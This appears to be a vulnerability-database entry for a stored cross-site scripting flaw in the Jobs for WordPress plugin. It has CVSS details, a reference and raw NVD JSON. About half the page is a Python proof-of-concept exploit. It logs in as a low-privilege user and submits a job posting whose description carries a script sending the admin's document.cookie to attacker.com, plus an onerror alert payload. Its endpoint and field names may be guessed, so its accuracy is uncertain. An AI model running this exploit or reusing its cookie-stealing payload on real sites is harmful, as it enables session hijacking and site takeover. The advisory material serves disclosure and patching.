Security Vulnerability Report
CVE-2025-68597 CVSS 6.5 MEDIUM

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS. This issue affects Jobs for WordPress: from n/a through <= 2.8.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jobs for WordPress Plugin <= 2.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-68597 PoC - Stored XSS in WordPress Jobs Plugin
# Target: WordPress site with Jobs for WordPress plugin <= 2.8.1
target = "http://target-wordpress-site.com"
username = "attacker_account"
password = "attacker_password"

# XSS payload - steals admin cookies
xss_payload = "<script>document.location='https://attacker.com/log?c='+document.cookie</script>"


def exploit_stored_xss():
    """
    This PoC demonstrates the stored XSS vulnerability in Jobs for WordPress plugin.
    The plugin fails to sanitize job posting fields before storing them in the database.
    When administrators view job listings, the malicious script executes.
    """
    session = requests.Session()

    # Step 1: Login to WordPress with low-privilege account
    login_url = f"{target}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)

    # Step 2: Submit malicious job posting
    job_submit_url = f"{target}/wp-admin/admin.php?page=job-postings-add"
    job_data = {
        'job_title': 'Senior Developer Position',
        'job_description': xss_payload,  # Malicious XSS payload
        'company_name': '<img src=x onerror=alert(document.domain)>',
        'submit_job': 'Publish'
    }
    response = session.post(job_submit_url, data=job_data)

    # Step 3: When admin visits job listing, XSS executes
    print("[*] Malicious job posting submitted successfully")
    print(f"[*] XSS Payload: {xss_payload}")
    print("[*] Wait for admin to view the job listing...")
    return True


if __name__ == "__main__":
    print("CVE-2025-68597 - WordPress Jobs Plugin Stored XSS")
    print("Target: Jobs for WordPress Plugin <= 2.8.1")
    exploit_stored_xss()

References

https://patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68597", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:27.177", "lastModified": "2026-04-27T19:16:35.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS.This issue affects Jobs for WordPress: from n/a through <= 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}